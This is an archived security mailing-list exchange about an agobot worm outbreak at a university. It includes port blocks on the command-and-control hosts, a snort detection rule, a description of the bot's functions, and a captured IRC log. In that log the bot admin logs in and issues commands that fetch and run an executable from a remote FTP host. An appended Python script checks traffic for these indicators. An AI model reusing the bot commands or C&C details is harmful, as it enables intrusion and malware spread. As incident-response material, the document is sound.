Open Source and information security mailing list archives
From: ddh at mtu.edu (David Hale)
Subject: Re: Outbreak of a virus on campus

We have currently blocked connections to/from port 7000 on the following hosts:

130.74.82.206
131.234.100.43
193.87.20.31

This seems to have contained the spread of the worm within our campus. The list of hosts was gathered with a snort signature of:

alert tcp $HOME_NET any -> any 7000 (msg:"agobot IRC traffic"; content:"weednet"; classtype:bad-unknown; sid:71727; rev:1;)

Until the block was in place we had shut down around 50 hosts (mainly on our dorm network) that had been infected with the worm.

-Dave Hale
Sr. Security Specialist
Michigan Technological University

> ----- Original Message -----
> From: "Morning Wood"
> Date: Sat, 24 Apr 2004 18:37:31 +0000
> To: mueller@...net.com, full-disclosure@...ts.netsys.com
> Subject: RE: [Full-Disclosure] Re: Outbreak of a virus on campus
>
>> phatbot?
>
> This one is yet another agobot. Has a long list of useful commands
> (included at the end of the posting, if someone is interested...),
> polymorph capability, stealth capability (hides its own process
> in memory and binary from listing), capable of updating itself
> via ftp/http, has a list of servers for evaluating connection speed,
> steals cdkeys, sniffs a wire, performs ddos, capable of installing
> a proxy, sends spam via aol, can install identd, has a LONG list of
> various processes to kill (mostly AV, but also regedit and tcpview
> among others), retrieves sysinfo, makes screenshots etc etc etc -
> looks similar to other good household bots :)
>
> What makes it interesting is its stealth capability and propagation.
> It has the following scanning/propagation subroutines:
>
> CScannerBagle
> CScannerBase
> CScannerDCOM
> CScannerDoom
> CScannerDW
> CScannerHTTP
> CScannerNetBios
> CScannerOptix
> CScannerSQL
> CScannerUPNP
> CScannerWKS
>
> When the worm is started, it connects to irc server
> 193.87.20.31 (irc.weednet.net) port 7000.
> Then it joins the password protected channel
> #1337, password is heyho. As the channel topic is
> .scan.startall, it accepts the command and starts
> scanning right away.
>
> I took my trusty irc client and joined that
> channel myself. Right away admin gave me those
> commands:
>
> <admin> .login stebo jamesbond007 -s
> <admin> .ftp.update ftp://ftp:bla@....uni-freiburg.de/incoming/dt.exe %TEMP%\xgf.exeBLAOR12
> <admin> .scan.stop
> <admin> .ftp.update ftp://ftp:bla@....uni-freiburg.de/incoming/dt.exe c:\xgf.exe BLAOR12
>
> seems like my 'bot' version was too old :)
>
> have fun :)
>
> W.
>
> -----------------------
> commands and parameters
> all commands start with . (dot)
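As an added example (not part of the original post or this thread), the triage Dave describes, a port-7000 block list plus the "weednet" content match from the snort rule, written as a small Python check over flow records. The C&C addresses, channel name and dot-commands come from the post above; the internal hosts, IRC nick and flows in SAMPLE are constructed sample data.

```python
import re
from collections import defaultdict

# C&C hosts quoted in the post (the port-7000 block list).
CNC_HOSTS = {"130.74.82.206", "131.234.100.43", "193.87.20.31"}
CNC_PORT = 7000
# Dot-prefixed bot commands named in the post; all agobot commands start with a dot.
BOT_COMMAND = re.compile(r"(?:^|[\s:])\.(?:scan|ftp|login)\b")

def classify(record):
    """Return the list of indicator names one flow record triggers.
    record: dict with src, dst, dport and payload (decoded IRC text or '')."""
    hits = []
    if record["dport"] == CNC_PORT and record["dst"] in CNC_HOSTS:
        hits.append("cnc_host_port_7000")
    payload = record["payload"]
    if "weednet" in payload.lower():  # mirrors content:"weednet" in the snort rule
        hits.append("weednet_irc")
    if re.search(r"JOIN\s+#1337\b", payload):  # channel named in the post
        hits.append("join_#1337")
    if BOT_COMMAND.search(payload):
        hits.append("bot_command")
    return hits

def infected_hosts(records):
    """Map each internal source host to the indicators it triggered, keeping
    only hosts with at least one hit (the candidate shutdown/block list)."""
    report = defaultdict(set)
    for r in records:
        for h in classify(r):
            report[r["src"]].add(h)
    return dict(report)

# Constructed sample flows (hypothetical internal hosts, not real campus data).
SAMPLE = [
    {"src": "10.1.5.20", "dst": "193.87.20.31", "dport": 7000,
     "payload": "NICK xgf-2819\r\nJOIN #1337 heyho\r\n"},
    {"src": "10.1.5.20", "dst": "193.87.20.31", "dport": 7000,
     "payload": ":irc.weednet.net 332 xgf-2819 #1337 :.scan.startall\r\n"},
    {"src": "10.1.7.44", "dst": "198.51.100.9", "dport": 443, "payload": ""},
    {"src": "10.1.9.3", "dst": "192.0.2.17", "dport": 7000,
     "payload": "JOIN #afternet-chat\r\n"},  # port 7000 alone is not an indicator
]

if __name__ == "__main__":
    for host, hits in sorted(infected_hosts(SAMPLE).items()):
        print(host, sorted(hits))
```

Only the first host is reported: the fourth flow uses port 7000 to an unlisted server and matches none of the IRC content checks, which is why the post blocks the port per C&C host rather than campus-wide.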